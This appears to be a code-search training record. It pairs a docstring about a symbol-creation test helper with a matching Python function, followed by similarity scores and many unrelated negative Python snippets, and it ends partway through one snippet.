[ "0.67069465", "0.6362347", "0.60579586", "0.5630345", "0.54816085", "0.5466467", "0.544671", "0.5360829", "0.53323615", "0.53214943", "0.5317366", "0.5301518", "0.5290404", "0.52551913", "0.52348626", "0.51969", "0.5128019", "0.5122039", "0.5115842", "0.50972366", "0.5093929", "0.50878334", "0.5085175", "0.5078906", "0.5053685", "0.5031911", "0.5017527", "0.5010337", "0.5005273", "0.5002902", "0.49663925", "0.495978", "0.49577793", "0.49346197", "0.49274442", "0.49203342", "0.49051732", "0.48984012", "0.48923394", "0.48488182", "0.48479095", "0.48472872", "0.4841549", "0.48310313", "0.48280957", "0.48280513", "0.4821775", "0.48153555", "0.48128363", "0.48104116", "0.48007655", "0.47935355", "0.4770342", "0.47678497", "0.47576627", "0.47242782", "0.47234905", "0.47229305", "0.47193727", "0.47166115", "0.4708984", "0.46938214", "0.46914837", "0.46742982", "0.46635488", "0.46487266", "0.46357644", "0.46326035", "0.463139", "0.46304053", "0.4628787", "0.46279776", "0.46242893", "0.4620992", "0.46160322", "0.46112922", "0.461063", "0.46100214", "0.4608178", "0.46042487", "0.4595492", "0.45914593", "0.45889625", "0.45875746", "0.45782232", "0.45732665", "0.4572035", "0.4559005", "0.45548242", "0.4553412", "0.45484912", "0.45475024", "0.45440847", "0.45426163", "0.45368478", "0.45307052", "0.45278323", "0.45199007", "0.4510294", "0.4506399" ]
0.48551324
39
Shortcut for symbol creation to test "function" and "indexed" API.
def symbol(name, dimensions, value=0., mode='function'): assert(mode in ['function', 'indexed']) s = DenseData(name=name, dimensions=dimensions) s.data[:] = value return s.indexify() if mode == 'indexed' else s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def FakeSymbol(*args, _op, **kwargs):\n return symbol.Custom(*args, _op=_op, op_type=\"_fake\", **kwargs)", "def __call__(fun_name):", "def input_shortcut(symbol, name=None):\n def input_method(self, *args, **kwargs):\n return self.input(symbol, *args, **kwargs)\n input_method.__name__ = str(name) if name is not None else (\"input_\" + str(symbol))\n input_method.__doc__ = \"Shortcut method to feed symbol '%s' into the FSM.\" % str(symbol)\n return input_method", "def node(func, name=None):\n return NamedFunc(func, name)", "def signature(function):\n pass", "def get_func_lookup():\n return {\n \"randomstr\": randomstr,\n \"random\": random,\n \"sha256\": sha256,\n \"ed25519\": ed25519_private_key,\n \"rsa\": rsa_private_key,\n \"rsapublic\": rsa_public_key,\n \"publickey\": public_key,\n \"reveal\": reveal,\n \"loweralphanum\": loweralphanum,\n \"basicauth\": basicauth,\n }", "def _index_symbols(predicates, functions):\n symbols, symbol_types = OrderedDict(), {}\n\n for s in predicates:\n argtypes = [t.type for t in s.arguments]\n symbols[s.name] = base.Predicate(s.name, argtypes)\n symbol_types[s.name] = 'bool'\n\n for s in functions:\n if s.name != 'total-cost': # Ignore the \"fake\" total-cost function\n argtypes = [t.type for t in s.arguments]\n symbols[s.name] = base.Function(s.name, argtypes, s.type)\n symbol_types[s.name] = s.type\n\n return symbols, symbol_types", "def Method_Access(function):\n \n pass", "def test(func):\n register_tests(func, [func.__name__])", "def __init__(self, func):\r\n self.getter = func\r\n self.name = func.__name__", "def action(func):\n ACTIONS[func.__name__.rstrip('_')] = func\n return func", "def test_symbol_lookup(self):\r\n\r\n def check_lookup(symbol, expected):\r\n op = BaseWhereOperator.get_operator(symbol)\r\n self.assertEqual(op, expected)\r\n\r\n check_lookup('EQ', EqualsOperator)\r\n check_lookup('IN', InOperator)\r\n check_lookup('GT', GreaterThanOperator)\r\n check_lookup('GTE', GreaterThanOrEqualOperator)\r\n check_lookup('LT', LessThanOperator)\r\n check_lookup('LTE', LessThanOrEqualOperator)", "def test_symbol_lookup(self):\n\n def check_lookup(symbol, expected):\n op = BaseWhereOperator.get_operator(symbol)\n self.assertEqual(op, expected)\n\n check_lookup('EQ', EqualsOperator)\n check_lookup('IN', InOperator)\n check_lookup('GT', GreaterThanOperator)\n check_lookup('GTE', GreaterThanOrEqualOperator)\n check_lookup('LT', LessThanOperator)\n check_lookup('LTE', LessThanOrEqualOperator)", "def _make_asserter(member):\n name, fun = member\n new_fun = assert_if_truthy(fun)\n if new_fun.__doc__:\n new_fun.__doc__ = new_fun.__doc__.replace(\"Check\", \"Assert\")\n new_fun.__module__ = __name__\n return (name, new_fun)", "def function(name: str, expr: vecpy.base.Expr, *args) -> vecpy.base.Function:\n return vecpy.base.Function(name, expr, *args)", "def createFunction(self, entryPoint: ghidra.program.model.address.Address, name: unicode) -> ghidra.program.model.listing.Function:\n ...", "def test_node_bracketless(self):\n\n @node\n def a(x):\n return x + \"a\"\n\n @node()\n def b(x):\n return x + \"b\"\n\n self.assertIsInstance(a, SimpleFunction)\n self.assertIsInstance(b, SimpleFunction)\n self.assertEqual((b | a)(\"_\"), \"_ba\")", "def key(func):\n return func.__func__ if hasattr(func, \"__func__\") else func", "def testCreateFunctionCallAction(self):\n\t\tfca = GeneratorAction(('key',), 'c', 'd')\n\t\tself.failUnless(fca.key == ('key',))\n\t\tself.failUnless(fca.pargs == 'c')\n\t\tself.failUnless(fca.vargs == 'd')", "def testinternfunc(self):\n\t\treturn describeInterface(self)", "def key(func):\n return func.__func__ if hasattr(func, \"__func__\") else func", "def __init__(self, func, dfunc, name=\"\"):\n self.name = name\n self.func = func\n self.dfunc = dfunc", "def __def_function__():\n pass", "def function(self, name):\n return function_documentor(name)", "def buildPythonDeclaration(self):\n raise Exception(\"Unimplemented function in symbol: \"+self.name)", "def __init__(self, total, function_name, param_sorts, return_sort):\r\n super(FunctionDecl, self).__init__()\r\n global functions\r\n self.total = total\r\n self.function_name = function_name\r\n self.param_sorts = param_sorts\r\n self.return_sort = return_sort\r\n self.basic = basic\r\n self.static = static\r\n\r\n function_info = []\r\n function_info.append(static)\r\n function_info.append(param_sorts)\r\n function_info.append(return_sort)\r\n functions[function_name] = function_info", "def getFunction(self, name: unicode) -> ghidra.program.model.listing.Function:\n ...", "def test_function_statement_at_operator():\n r = convert_code(\"{@foo arg1=bar arg2=3}\")\n assert r == \"{{ {'arg1': bar, 'arg2': 3}|foo }}\"", "def testCreateFunctionCallAction(self):\n\t\tfca = FunctionCallAction(('key',), 'c', 'd', 'ret')\n\t\tself.failUnless(fca.key == ('key',))\n\t\tself.failUnless(fca.pargs == 'c')\n\t\tself.failUnless(fca.vargs == 'd')\n\t\tself.failUnless(fca.value == 'ret')", "def test_func(self):\n def func():\n return 0\n self.assertEqual(type(decorators.timeit(func)), types.FunctionType)", "def my_fuction():\n pass", "async def api(self, symbol: str):\n await self._get_symbols()\n if symbol in self.symbols:\n symbol = self.symbols[symbol]\n if symbol['kind'] == 'fn':\n signature = '{} {}({});'.format(symbol['returns'], symbol['name'],\n 'void' if len(symbol['params']) == 0 else ', '.join(\n '{} {}'.format(x['type'], x['name']) for x in symbol['params']))\n description = self._clean_html(symbol['description'])\n if len(symbol['params']) > 0:\n params = \"\\n\\n**Parameters**\\n\" + '\\n'.join('`{}`: {}'.format(\n x['name'], self._code(x['description'])) for x in symbol['params'])\n else:\n params = ''\n if symbol['return_desc']:\n ret_desc = \"\\n\\n**Returns:** \" + self._code(symbol['return_desc'])\n else:\n ret_desc = ''\n await self.bot.say(\"```c\\n{}\\n```{}{}{}\".format(signature, description, params, ret_desc))\n else:\n await self.bot.say(\"`{}`: {}\".format(symbol['name'], self._clean_html(symbol['description'])))\n else:\n await self.bot.say(\"No such symbol.\")", "def __init__(self, function=None, name=None, description=None):\n self.name = name\n self.function = function\n self.description = description", "def __call__(self, func: Callable) -> Callable:\n NAME_TO_SYMBOL[self._exported_name] = Symbol.from_callable(\n self._exported_name, func)\n return func", "def __init__(self, total, function_name, param_sorts, return_sort):\n super(FunctionDecl, self).__init__()\n global functions\n self.total = total\n self.function_name = function_name\n self.param_sorts = param_sorts\n self.return_sort = return_sort\n self.basic = basic\n self.static = static\n\n function_info = []\n function_info.append(static)\n function_info.append(param_sorts)\n function_info.append(return_sort)\n functions[function_name] = function_info", "def existing_method_from_name(fun_name):\n global STensor\n assert hasattr(torch.Tensor, fun_name)\n if getattr(torch, fun_name) in STABLE_FUNCTIONS:\n stable_fun = STABLE_FUNCTIONS[getattr(torch, fun_name)]\n STABLE_FUNCTIONS[getattr(torch.Tensor, fun_name)] = stable_fun\n setattr(STensor, fun_name, stable_fun)\n else:\n print(f\"STILL NEED TO IMPLEMENT {fun_name}\")", "def auto_symbol(tokens: List[TOKEN], local_dict: DICT, global_dict: DICT):\n result: List[TOKEN] = []\n prevTok = (-1, '')\n\n tokens.append((-1, '')) # so zip traverses all tokens\n for tok, nextTok in zip(tokens, tokens[1:]):\n tokNum, tokVal = tok\n nextTokNum, nextTokVal = nextTok\n if tokNum == NAME:\n name = tokVal\n\n if (name in ['True', 'False', 'None']\n or iskeyword(name)\n # Don't convert attribute access\n or (prevTok[0] == OP and prevTok[1] == '.')\n # Don't convert keyword arguments\n or (prevTok[0] == OP and prevTok[1] in ('(', ',')\n and nextTokNum == OP and nextTokVal == '=')\n # the name has already been defined\n or name in local_dict and local_dict[name] is not null):\n result.append((NAME, name))\n continue\n elif name in local_dict:\n local_dict.setdefault(null, set()).add(name)\n if nextTokVal == '(':\n local_dict[name] = Function(name)\n else:\n local_dict[name] = Symbol(name)\n result.append((NAME, name))\n continue\n elif name in global_dict:\n obj = global_dict[name]\n if isinstance(obj, (AssumptionKeys, Basic, type)) or callable(obj):\n result.append((NAME, name))\n continue\n\n result.extend([\n (NAME, 'Symbol' if nextTokVal != '(' else 'Function'),\n (OP, '('),\n (NAME, repr(str(name))),\n (OP, ')'),\n ])\n else:\n result.append((tokNum, tokVal))\n\n prevTok = (tokNum, tokVal)\n\n return result", "def special_def(self, form):\n if not len(form) >= 3:\n raise SyntaxError(\"Not enough forms in %s\" % form)\n if not isinstance(form[1], Form):\n raise SyntaxError(\"Expected a list of [funname args...]\")\n\n doc, code = self._getDocAndCode(form[2:])\n #print \"GOT\", code\n #code.nodes[-1] = ast.Return(code.nodes[-1])\n args = [x.name for x in form[1][1:]]\n \n magicode = self._getMagicCodeForArgs(args)\n \n return ast.Function(None, form[1][0].name, args, [], magicode, doc, code)", "def test_simple_funcs(self):\r\n variables = {'x': 4.712}\r\n functions = {'id': lambda x: x}\r\n self.assertEqual(calc.evaluator({}, functions, 'id(2.81)'), 2.81)\r\n self.assertEqual(calc.evaluator({}, functions, 'id(2.81)'), 2.81)\r\n self.assertEqual(calc.evaluator(variables, functions, 'id(x)'), 4.712)\r\n\r\n functions.update({'f': numpy.sin})\r\n self.assertAlmostEqual(\r\n calc.evaluator(variables, functions, 'f(x)'),\r\n -1, delta=1e-3\r\n )", "def test_method_creation():\n my_method = SGMethod(\"Test\")\n \n assert my_method.name == \"Test\"\n assert len(my_method.params) == 0\n assert my_method.return_type == None", "def virtual(func: \"callable\"):\n return func", "def function_name(parameters):", "def op():\n\n def _register(func):\n\n def _func_wrapper(*args, **kwargs):\n if len(args) > 0:\n raise Exception(\"You may only invoke an @hml.op with named arguments\")\n\n hml_op = HmlContainerOp(func, kwargs)\n\n return hml_op.op\n\n return _func_wrapper\n\n return _register", "def builtin_utility(func):\n func.is_utility = True\n return func", "def istest(func):\n func.__test__ = True\n return func", "def node(_func=None, *, name=None):\n\n def decorator(function):\n newfunc = SimpleFunction(function, name=name)\n return newfunc\n\n if not _func:\n return decorator\n return decorator(_func)", "def define_vmethod(self, type, name, func):\n try:\n self.OPS[type.lower()][name] = func\n except KeyError:\n raise Error(\"invalid vmethod type: %s\\n\" % type)", "def test_function_definition_with_args(self):\n self.script(\"# script.py\\n\"\n \"def f(x, y=False):\\n\"\n \" 'fdoc'\\n\"\n \" pass\\n\")\n self.compile()\n\n script = self.find_code_component(name=\"script.py\")\n function_def = self.find_code_component(name=\"f\")\n var_x = self.find_code_component(name=\"x\")\n var_y = self.find_code_component(name=\"y\")\n false = self.find_code_component(name=\"False\")\n\n self.assertEqual(function_def.type, \"function_def\")\n self.assertEqual(function_def.mode, \"w\")\n self.assertEqual(function_def.first_char_line, 2)\n self.assertEqual(function_def.first_char_column, 0)\n self.assertEqual(function_def.last_char_line, 4)\n self.assertEqual(function_def.last_char_column, 8)\n self.assertEqual(function_def.container_id, script.id)\n\n self.assertEqual(var_x.type, \"param\")\n self.assertEqual(var_x.mode, \"w\")\n self.assertEqual(var_x.first_char_line, 2)\n self.assertEqual(var_x.first_char_column, 6)\n self.assertEqual(var_x.last_char_line, 2)\n self.assertEqual(var_x.last_char_column, 7)\n self.assertEqual(var_x.container_id, function_def.id)\n\n self.assertEqual(var_y.type, \"param\")\n self.assertEqual(var_y.mode, \"w\")\n self.assertEqual(var_y.first_char_line, 2)\n self.assertEqual(var_y.first_char_column, 9)\n self.assertEqual(var_y.last_char_line, 2)\n self.assertEqual(var_y.last_char_column, 10)\n self.assertEqual(var_y.container_id, function_def.id)\n\n #self.assertEqual(false.type, \"literal\")\n self.assertEqual(false.mode, \"r\")\n self.assertEqual(false.first_char_line, 2)\n self.assertEqual(false.first_char_column, 11)\n self.assertEqual(false.last_char_line, 2)\n self.assertEqual(false.last_char_column, 16)\n self.assertEqual(false.container_id, function_def.id)\n\n function_def_block = self.metascript.code_blocks_store[function_def.id]\n self.assertEqual(function_def_block.code,\n \"def f(x, y=False):\\n\"\n \" 'fdoc'\\n\"\n \" pass\")\n self.assertEqual(function_def_block.docstring, \"fdoc\")\n self.assertTrue(bool(function_def_block.code_hash))", "def test_func_2(self):\n def func():\n return 0\n self.assertEqual(type(decorators.timeit_2(func)), types.FunctionType)", "def __getattr__(self, exported_function_name: str) -> ExportedFunction:\n pass", "def test_11_funcdecl(self):\n\t\tinput = \"\"\"var x,y:integer;\n\t\tprocedure main(); var x:real; begin x:=y(1,false); {error} end\"\"\"\n\t\texpect = \"Undeclared Function: y\"\n\t\tself.assertTrue(TestChecker.test(input,expect,411))", "def __init__(self, function):\n self.function = function", "def __init__(self, func):\n self.doc = func.__doc__", "def __init__(self, func, type):\n self.func = func\n self.type = type", "def for_function(self, func):\n return self.for_pysig(utils.pysignature(func))", "def testCtor(self):\n try: pykd.DiaSymbol()\n except RuntimeError: pass", "def createSymbol(self, address: ghidra.program.model.address.Address, name: unicode, makePrimary: bool) -> ghidra.program.model.symbol.Symbol:\n ...", "def symbolic(inputs):\n def decorator(method):\n name = \"__\" + method.__name__\n \n def wrapper(self, *args):\n if isinstance(args[0], T.Variable):\n return method(self, *args)\n elif hasattr(self, name):\n return getattr(self, name)(*args)\n else:\n res = method(self, *inputs)\n \n if type(res) is tuple:\n output, updates = res\n else:\n output, updates = res, None\n \n setattr(self, name, theano.function(inputs, output,\n updates=updates))\n \n return getattr(self, name)(*args)\n \n return wrapper\n \n return decorator", "def identify_method(self, func):", "def example_function():", "def _register_command(self, function, command_name):\r\n if command_name in self._commands:\r\n raise self.Error('Found two definitions for command %s' % command_name)\r\n self._commands[command_name] = function\r\n return function", "def test_function_doc_string():\n functions = inspect.getmembers(session10, inspect.isfunction)\n for function in functions:\n assert function[1].__doc__", "def split_symbols_custom(predicate: Callable[[str], bool]):\n def _split_symbols(tokens: List[TOKEN], local_dict: DICT, global_dict: DICT):\n result: List[TOKEN] = []\n split = False\n split_previous=False\n\n for tok in tokens:\n if split_previous:\n # throw out closing parenthesis of Symbol that was split\n split_previous=False\n continue\n split_previous=False\n\n if tok[0] == NAME and tok[1] in ['Symbol', 'Function']:\n split = True\n\n elif split and tok[0] == NAME:\n symbol = tok[1][1:-1]\n\n if predicate(symbol):\n tok_type = result[-2][1] # Symbol or Function\n del result[-2:] # Get rid of the call to Symbol\n\n i = 0\n while i < len(symbol):\n char = symbol[i]\n if char in local_dict or char in global_dict:\n result.append((NAME, \"%s\" % char))\n elif char.isdigit():\n chars = [char]\n for i in range(i + 1, len(symbol)):\n if not symbol[i].isdigit():\n i -= 1\n break\n chars.append(symbol[i])\n char = ''.join(chars)\n result.extend([(NAME, 'Number'), (OP, '('),\n (NAME, \"'%s'\" % char), (OP, ')')])\n else:\n use = tok_type if i == len(symbol) else 'Symbol'\n result.extend([(NAME, use), (OP, '('),\n (NAME, \"'%s'\" % char), (OP, ')')])\n i += 1\n\n # Set split_previous=True so will skip\n # the closing parenthesis of the original Symbol\n split = False\n split_previous = True\n continue\n\n else:\n split = False\n\n result.append(tok)\n\n return result\n\n return _split_symbols", "def test_name_properties_on_function():\n assert not Function(name=\"b\", path=\"a.b\", file_path=\"a.py\").name_properties\n assert \"private\" in Function(name=\"_b\", path=\"a._b\", file_path=\"a.py\").name_properties\n assert not Function(name=\"__b\", path=\"a.__b\", file_path=\"a.py\").name_properties\n assert not Function(name=\"__b__\", path=\"a.__b__\", file_path=\"a.py\").name_properties", "def wrapper(func):\n docstring = func.__doc__\n helpdict = parse_docstring(\n docstring, key_symbol=key_symbol,\n description_symbol=description_symbol)\n func.helpdict = helpdict\n # remove markers\n docstring = docstring.replace(key_symbol, '')\n func.__doc__ = docstring.replace(description_symbol, '')\n return func", "def register_command(func):\n supported_commands.append(func.__name__)\n return func", "def getFunctionSymbol(self, symbol):\n if ( symbol in list(self.dict.keys()) and self.dict[symbol][\"type\"] == \"func\"):\n return self.dict[symbol]\n return None", "def add_symbol(self, symbol_name: str, attrs: dict):\n attrs[SymbolAttrs.IS_FUNC] = attrs.get(SymbolAttrs.IS_FUNC, False)\n\n if not attrs[SymbolAttrs.IS_FUNC]:\n if SymbolAttrs.TYPE not in attrs:\n raise SymbolWithoutType(symbol_name)\n\n attrs[SymbolAttrs.SIZE] = get_type_size(attrs)\n attrs[SymbolAttrs.OFFSET] = self.next_offset\n\n self.next_offset += attrs[SymbolAttrs.SIZE]\n self.symbols[symbol_name] = attrs", "def __init__(self, func):\n self.dictionary = {}\n self.func = func", "def createSymbol(self, address: ghidra.program.model.address.Address, name: unicode, makePrimary: bool, makeUnique: bool, sourceType: ghidra.program.model.symbol.SourceType) -> ghidra.program.model.symbol.Symbol:\n ...", "def test__repr__(self):\n def func():\n pass\n assert repr(Factory(func)) == '<Factory {}>'.format(func.__qualname__)", "def process_fn(fn_string, symbols):\n fn_string = fn_string.replace('^', '**')\n fn = lambdify([sympy.symbols(symbols)], fn_string, 'numpy')\n return fn", "def test_override_symbol(self):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2.)\n a1 = symbol(name='a1', dimensions=(i, j, k, l), value=3.)\n a2 = symbol(name='a2', dimensions=(i, j, k, l), value=4.)\n op = Operator(Eq(a, a + 3))\n op()\n op(a=a1)\n op(a=a2)\n shape = [d.size for d in [i, j, k, l]]\n\n assert(np.allclose(a.data, np.zeros(shape) + 5))\n assert(np.allclose(a1.data, np.zeros(shape) + 6))\n assert(np.allclose(a2.data, np.zeros(shape) + 7))", "def create_test_function(description, purl, canonical_purl, is_invalid,\n type, name, namespace, version, qualifiers, subpath, # NOQA\n test_func_prefix='test_purl_pkg_', **kwargs):\n if is_invalid:\n\n def test_purl(self):\n try:\n PackageURL.from_string(purl)\n self.fail('Should raise a ValueError')\n except ValueError:\n pass\n\n try:\n PackageURL.from_string(canonical_purl)\n self.fail('Should raise a ValueError')\n except ValueError:\n pass\n\n try:\n PackageURL(type, namespace, name, version, qualifiers, subpath)\n except ValueError:\n pass\n\n else:\n\n def test_purl(self):\n # parsing the test canonical `purl` then re-building a `purl` from these\n # parsed components should return the test canonical `purl`\n cano = PackageURL.from_string(purl)\n assert canonical_purl == cano.to_string()\n\n # parsing the test `purl` should return the components parsed from the\n # test canonical `purl`\n parsed = PackageURL.from_string(canonical_purl)\n assert cano.to_dict() == parsed.to_dict()\n\n # parsing the test `purl` then re-building a `purl` from these parsed\n # components should return the test canonical `purl`\n assert canonical_purl == parsed.to_string()\n\n # building a `purl` from the test components should return the test\n # canonical `purl`\n built = PackageURL(type, namespace, name, version, qualifiers, subpath)\n assert canonical_purl == built.to_string()\n\n # create a good function name for use in test discovery\n if not description:\n description = purl\n if is_invalid:\n test_func_prefix += 'is_invalid_'\n test_name = python_safe_name(test_func_prefix + description)\n test_purl.__name__ = test_name\n test_purl.funcname = test_name\n return test_purl, test_name", "def __init__(self, var_name, function, description):\n \n self.var_name = var_name\n self.function = function\n self.description = description", "def test_from_callable(self):\n def func(a: int = 0):\n return a\n fsig = FSignature.from_callable(func)\n assert len(fsig.parameters) == 1\n assert fsig.parameters['a'] == FParameter(\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n name='a',\n interface_name='a',\n default=0,\n type=int,\n )", "def test_function_definition(self):\n func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)\n assert func", "def test_function_definition(self):\n func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)\n assert func", "def register_function(self, function, name=None):\n if name:\n self[name] = function\n else:\n self[function.__name__] = function", "def func():", "def test_keyword(self):\n varargs = ()\n kwargs = {'default' : 12}\n method = getattr(self.foo,'f_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['default'] == 12)\n self.assert_(len(var_dict) == 1)", "def test_function_name_had_cap_letter():\n functions = inspect.getmembers(s7, inspect.isfunction)\n for function in functions:\n assert len(re.findall('([A-Z])', function[0])) == 0, \"You have used Capital letter(s) in your function names\"", "def __init__(self, function, function_representation):\n self.function = function\n self.function_representation = function_representation", "def get_symbols(**kwargs):\n return Symbols(**kwargs).fetch()", "def __init__(self, name=None, description=None):\n super().__init__()\n self.name = name or getattr(self, \"name\", type(self).__name__.lower())\n self.description = description or getattr(self, \"description\", None) or self.__doc__ or self.__class__.__name__\n self.operations = {}\n for function in (attr for attr in (getattr(self, nom) for nom in dir(self)) if callable(attr)):\n try:\n operation = function._roax_operation_\n except:\n continue # ignore undecorated functions\n self._register_operation(**operation)", "def getFunction(self, key: long) -> ghidra.program.model.listing.Function:\n ...", "def true(symbol):\n return True", "def command(fxn):\n\tCMDTABLE[fxn.__name__] = (fxn, fxn.__doc__)\n\treturn fxn", "def test_13_funcdecl(self):\n\t\tinput = \"\"\"var x:integer;\n\t\tprocedure main(); var x:real; begin x:=y(1,2); end\n\t\tfunction y(x:integer;y:boolean):integer; {OK} begin return 1; end\"\"\"\n\t\texpect = \"Type Mismatch In Expression: CallExpr(Id(y),[IntLiteral(1),IntLiteral(2)])\"\n\t\tself.assertTrue(TestChecker.test(input,expect,413))", "def getFunction(self) -> ghidra.program.model.listing.Function:\n ...", "def make_func_code(params):\n class FuncCode(object):\n __slots__ = ('co_varnames', 'co_argcount')\n fc = FuncCode()\n fc.co_varnames = params\n fc.co_argcount = len(params)\n return fc", "def __init__ ( self , func , deriv = None , name = '' ) :\n self.__func = func\n if deriv and callable ( deriv ) : self.__derivative = deriv\n else : self.__derivative = Derivative(func)\n \n if name : self.__name__ = name \n elif hasattr ( func , '__name__' ) and '<lambda>' != func.__name__ :\n self.__name__ = func.__name__\n else : self.__name__ = 'Eval2VE'", "def test_visit_Call__private_function():\n result = compile_restricted_exec('__init__(1)')\n assert result.errors == (\n 'Line 1: \"__init__\" is an invalid variable name because it starts with \"_\"', # NOQA: E501\n )", "def get_func(name, argtypes=None, restype=c_int, lib=libDE):\n logger.debug(\"Getting NewWordFinder API function: 'name': '{}', 'argtypes': '{}',\"\n \" 'restype': '{}'.\".format(name, argtypes, restype))\n func = getattr(lib, name)\n if argtypes is not None:\n func.argtypes = argtypes\n if restype is not c_int:\n func.restype = restype\n logger.debug(\"NewWordFinder API function '{}' retrieved.\".format(name))\n return func", "def GetScriptableInterface(f):\n\n\tconstants = [] # returned as a sorted list\n\tfunctions = {} # returned as a sorted list of items\n\tproperties = {} # returned as a sorted list of items\n\n\tfor name in f.order:\n\t\tfeatures = f.features[name]\n\t\tif features[\"Category\"] != \"Deprecated\":\n\t\t\tif features[\"FeatureType\"] == \"val\":\n\t\t\t\tconstants.append( (name, features) )\n\t\t\telif features[\"FeatureType\"] in [\"fun\",\"get\",\"set\"]:\n\t\t\t\tif features[\"FeatureType\"] == \"get\":\n\t\t\t\t\tpropname = name.replace(\"Get\", \"\", 1)\n\t\t\t\t\tproperties[propname] = (name, properties.get(propname,(None,None))[1])\n\n\t\t\t\telif features[\"FeatureType\"] == \"set\":\n\t\t\t\t\tpropname = name.replace(\"Set\", \"\", 1)\n\t\t\t\t\tproperties[propname] = (properties.get(propname,(None,None))[0], name)\n\n\t\t\t\telse:\n\t\t\t\t\tfunctions[name] = features\n\n\tpropertiesCopy = properties.copy()\n\tfor propname, (getterName, setterName) in propertiesCopy.items():\n\t\tgetter = getterName and f.features[getterName]\n\t\tsetter = setterName and f.features[setterName]\n\n\t\tgetterValue, getterIndex, getterIndexName, getterType = 0, None, None, None\n\t\tsetterValue, setterIndex, setterIndexName, setterType = 0, None, None, None\n\t\tpropType, propIndex, propIndexName = None, None, None\n\n\t\tisok = (getterName or setterName) and not (getter is setter)\n\n\t\tif isok and getter:\n\t\t\tif getter['Param2Type'] == 'stringresult':\n\t\t\t\tgetterType = getter['Param2Type']\n\t\t\telse:\n\t\t\t\tgetterType = getter['ReturnType']\n\t\t\tgetterType = ConvertEnu(getterType)\n\t\t\tgetterValue = getter['Value']\n\t\t\tgetterIndex = getter['Param1Type'] or 'void'\n\t\t\tgetterIndexName = getter['Param1Name']\n\n\t\t\tisok = ((getter['Param2Type'] or 'void') == 'void') or (getterType == 'stringresult')\n\n\t\tif isok and setter:\n\t\t\tsetterValue = setter['Value']\n\t\t\tsetterType = ConvertEnu(setter['Param1Type']) or 'void'\n\t\t\tsetterIndex = 'void'\n\t\t\tif (setter['Param2Type'] or 'void') != 'void':\n\t\t\t\tsetterIndex = setterType\n\t\t\t\tsetterIndexName = setter['Param1Name']\n\t\t\t\tsetterType = ConvertEnu(setter['Param2Type'])\n\n\t\t\tisok = (setter['ReturnType'] == 'void') or (setter['ReturnType'] == 'int' and setterType=='string')\n\n\t\tif isok and getter and setter:\n\t\t\tisok = ((getterType == setterType) or (getterType == 'stringresult' and setterType == 'string')) and (getterIndex == setterIndex)\n\n\t\tpropType = getterType or setterType\n\t\tpropIndex = getterIndex or setterIndex\n\t\tpropIndexName = getterIndexName or setterIndexName\n\n\t\tif isok:\n\t\t\t# do the types appear to be useable? THIS IS OVERRIDDEN BELOW\n\t\t\tisok = (propType in ('int', 'position', 'line', 'pointer', 'colour', 'colouralpha', 'bool', 'string', 'stringresult')\n\t\t\t\tand propIndex in ('void','int','position','line','string','bool'))\n\n\t\t\t# getters on string properties follow a different protocol with this signature\n\t\t\t# for a string getter and setter:\n\t\t\t# get int funcname(void,stringresult)\n\t\t\t# set void funcname(void,string)\n\t\t\t#\n\t\t\t# For an indexed string getter and setter, the indexer goes in\n\t\t\t# wparam and must not be called 'int length', since 'int length'\n\t\t\t# has special meaning.\n\n\t\t\t# A bool indexer has a special meaning. It means \"if the script\n\t\t\t# assigns the language's nil value to the property, call the\n\t\t\t# setter with args (0,0); otherwise call it with (1, value).\"\n\t\t\t#\n\t\t\t# Although there are no getters indexed by bool, I suggest the\n\t\t\t# following protocol: If getter(1,0) returns 0, return nil to\n\t\t\t# the script. Otherwise return getter(0,0).\n\n\n\t\tif isok:\n\t\t\tproperties[propname] = {\n\t\t\t\t\"GetterValue\" : getterValue,\n\t\t\t\t\"SetterValue\" : setterValue,\n\t\t\t\t\"PropertyType\" : propType,\n\t\t\t\t\"IndexParamType\" : propIndex,\n\t\t\t\t\"IndexParamName\" : propIndexName,\n\t\t\t\t# The rest of this metadata is added to help generate documentation\n\t\t\t\t\"Category\" : (getter or setter)[\"Category\"],\n\t\t\t\t\"GetterName\" : getterName,\n\t\t\t\t\"SetterName\" : setterName,\n\t\t\t\t\"GetterComment\" : CommentString(getter),\n\t\t\t\t\"SetterComment\" : CommentString(setter)\n\t\t\t}\n\t\t\t#~ print(properties[propname])\n\n\t\t\t# If it is exposed as a property, the constant name is not picked up implicitly\n\t\t\t# (because the name is different) but its constant should still be exposed.\n\t\t\tif getter:\n\t\t\t\tconstants.append( (\"SCI_\" + getterName.upper(), getter))\n\t\t\tif setter:\n\t\t\t\tconstants.append( (\"SCI_\" + setterName.upper(), setter))\n\t\telse:\n\t\t\t# Cannot parse as scriptable property (e.g. not symmetrical), so export as functions\n\t\t\tdel(properties[propname])\n\t\t\tif getter:\n\t\t\t\tfunctions[getterName] = getter\n\t\t\tif setter:\n\t\t\t\tfunctions[setterName] = setter\n\n\tfunclist = list(functions.items())\n\tfunclist.sort()\n\n\tproplist = list(properties.items())\n\tproplist.sort()\n\n\tconstants.sort()\n\n\treturn (constants, funclist, proplist)", "def add_index(self, name, func):\n assert name not in self.indices\n info_name = 'index:%s:%s' % (self.info['name'], name)\n info = self.store._get_info(info_name, index_for=self.info['name'])\n index = Index(self, info, func)\n self.indices[name] = index\n if IndexKeyBuilder:\n self._index_keys = IndexKeyBuilder(self.indices.values()).build\n return index", "def test_symbol():\n token = Token(\"+\", TokenInfo(\"<stdin>\", 0, 1, \" ++\"))\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"+\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.ADD\n assert token.info.line == \" ++\"\n\n token = token()\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"+\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.ADD\n assert token.info.line == \" ++\"\n\n token += \"+\"\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n token = token()\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" 